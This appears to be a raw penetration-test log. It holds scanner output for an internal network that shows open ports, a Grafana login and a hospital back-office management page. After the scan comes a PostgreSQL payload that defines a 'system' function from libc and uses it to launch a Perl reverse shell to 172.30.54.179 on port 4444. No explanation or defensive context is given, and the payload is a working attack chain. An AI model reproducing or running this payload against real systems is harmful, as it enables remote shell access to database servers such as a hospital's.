start infoscan (icmp) Target 172.30.54.179 is alive (icmp) Target 172.30.54.12 is alive [*] Icmp alive hosts len is: 2 172.30.54.12:22 open 172.30.54.179:22 open 172.30.54.12:3000 open 172.30.54.12:5432 open 172.30.54.179:8009 open 172.30.54.179:8080 open 172.30.54.179:44401 open [*] alive ports len is: 7 start vulscan [*] WebTitle: http://172.30.54.12:3000 code:302 len:29 title:None 跳转url: http://172.30.54.12:3000/login [*] WebTitle: http://172.30.54.12:3000/login code:200 len:27909 title:Grafana [*] WebTitle: http://172.30.54.179:8080 code:200 len:3964 title:医院后台管理平台
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');